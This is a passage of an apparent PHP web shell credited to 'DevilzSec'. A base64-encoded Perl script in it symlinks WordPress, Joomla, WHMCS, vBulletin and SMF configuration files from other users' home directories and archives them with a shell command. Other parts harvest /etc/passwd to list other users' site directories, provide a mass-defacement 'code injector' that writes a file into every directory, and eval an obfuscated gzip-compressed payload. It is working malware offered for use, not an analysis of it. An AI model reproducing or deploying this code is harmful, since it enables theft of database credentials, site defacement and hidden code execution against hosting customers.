Jy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3Atc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9tYWluL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC90ZXN0L3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLictNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJy03LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywka29sYS4nLTgudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRrb2xhLictOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLCRrb2xhLictMTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLW1haW4udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLW5ldy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1ob21lLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmI0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictaW5jbHVkZXMtdmIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLWNlbnRyYWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vV0hNQ1MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWMtV0hNLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHAudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2VjdXJlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdHMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1Ym1pdHRpY2tldC5waHAnLCRrb2xhLictd2htY3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudHMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGVzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudGVzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50c3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmcudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXkudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL215c2hvcC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXlzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaG9wL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLVpDc2hvcC50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc21mL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYyLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictc21mLWZvcnVtLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bXMvU2V0dGluZ3MucGhwJywka29sYS4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC91cC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwMi50eHQnKTsgDQp9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9ImJsYWNrIj4NCjxwPkdyZWF0IFRvIENEQyB8IEN5YjNyU2VjIHwgRG90TXkgfCBEZXZpbHpTZWMgfDwvcD4NCjxiciAvPjxmb3JtIG1ldGhvZD0icG9zdCI+PHN0cm9uZz4NCjx0ZXh0YXJlYSBpZD0iY2hlY2tvdXR0ZXh0YXJlYSIgbmFtZT0icGFzcyIgc3R5bGU9ImJvcmRlcjoxcHggc29saWQgIzRDODNBRjsgd2lkdGg6ICA0OThweDsgaGVpZ2h0OiAzNzBweDsgYmFja2dyb3VuZC1jb2xvcjojMTExMTExOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZTo5cHQ7IGNvbG9yOiB3aGl0ZSIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjFweCBzb2xpZCAjNEM4M0FGOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzExMTExMTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjp3aGl0ZTsgIiAgLz48YnIgLz4NCiZuYnNwOzwvcD4NCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNvbmZpZyBDaGVjayIgc3R5bGU9ImJvcmRlcjoxcHggc29saWQgIzRDODNBRjsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjogd2hpdGU7IHRleHQtdHJhbnNmb3JtOnVwcGVyY2FzZTsgaGVpZ2h0OjIzOyBiYWNrZ3JvdW5kLWNvbG9yOiMxMTExMTE7IiAvPjwvcD4NCjwvZm9ybT48L3N0cm9uZz4NCic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9IkJsYWNrIj4NCjxoMj5TdWNjZXNzZnVsbCBDaGVja2VyICE8L2gyPg0KPGlmcmFtZSBzcmM9Y29uZmlnd2ViLyB3aWR0aD0xMDAlIGhlaWdodD02MjBweCBmcmFtZWJvcmRlcj0wPjwvaWZyYW1lPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250PjwvYT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==';
$config1 = fopen('config.Dz','w+');
$cofig2 = fwrite($config1 ,base64_decode($config));
fclose($config1);
chmod('config.Dz',0755);
echo '<iframe src=web_/config.Dz width=100% height=620px frameborder=0></iframe> ';;
}
if (isset($_POST['5']))
{
($sm = ini_get('safe_mode') == 0) ?$sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) {die("<center><pre style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>");}
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i >35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
echo '<br><br><textarea class="output" >';
echo '[+] Founded '.sizeof($users)." entrys in /etc/passwd\n";
echo '[+] Founded '.sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
echo "$path \n";
}
echo "\n";
echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n";
echo "[+] Complete...\n";
echo '</textarea><br><br></b>
	</body>
	</html>';
}
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'Code'))
{
;echo '	<form action="?y=';echo $pwd;;echo '&amp;x=Code" method="post">
	';
echo '<table class="tabnet" style="width:320px;padding:0 1px;">';
echo '<tr><th colspan="2"><center><h1>Code injector By DevilzSec Team</h1><div class=content></tr>';
echo '<td colspan="2"><p style="text-align:center;"><form ENCTYPE="multipart/form-data" action='.$_SERVER['PHP_SELF'].' " method=post>';
echo 'Direction Name <br><input class=inputz  type=text name=path size=60 value='.$pwd.'><br>';
echo 'File Name <br><input class=inputz  type=text name=file size=60 value="Dz.html"><br>';
echo 'Source Deface<br><input class=inputz  type=text name=url size=60   value="<a>By D4rkDriv3r DevilzSec<a>"><br>';
echo '<input type=submit class=inputzbut  value=Deface></p></form><html></td></p>';
$mainpath=$_POST[path];
$file=$_POST[file];
$$txtContents=$_POST[url];
echo '
<tr><th colspan="5"><center><h1>Attack !!</h1></th>';
$dir=opendir("$mainpath");
while($row=readdir($dir))
{
$start=@fopen("$row/$file",'w+');
$code=$$txtContents;
$finish=@fwrite($start,$code);
if ($finish)
{
echo "<tr><td><div><strong>$row/$file</strong><span style='color:red;'> Was Inject</span></td></tr>";
}
}
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'about'))
{
;echo '	<form action="?y=';echo $pwd;;echo '&amp;x=about" method="post">
	';
echo 'COming Soon,INsyallah';
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'php'))
{
;echo '
<form action="?y=';echo $pwd;;echo '&amp;x=php" method="post">
<table class="cmdbox">
<tr>
<td>
<textarea class="output" name="cmd" id="cmd">';eval(gzinflate(base64_decode('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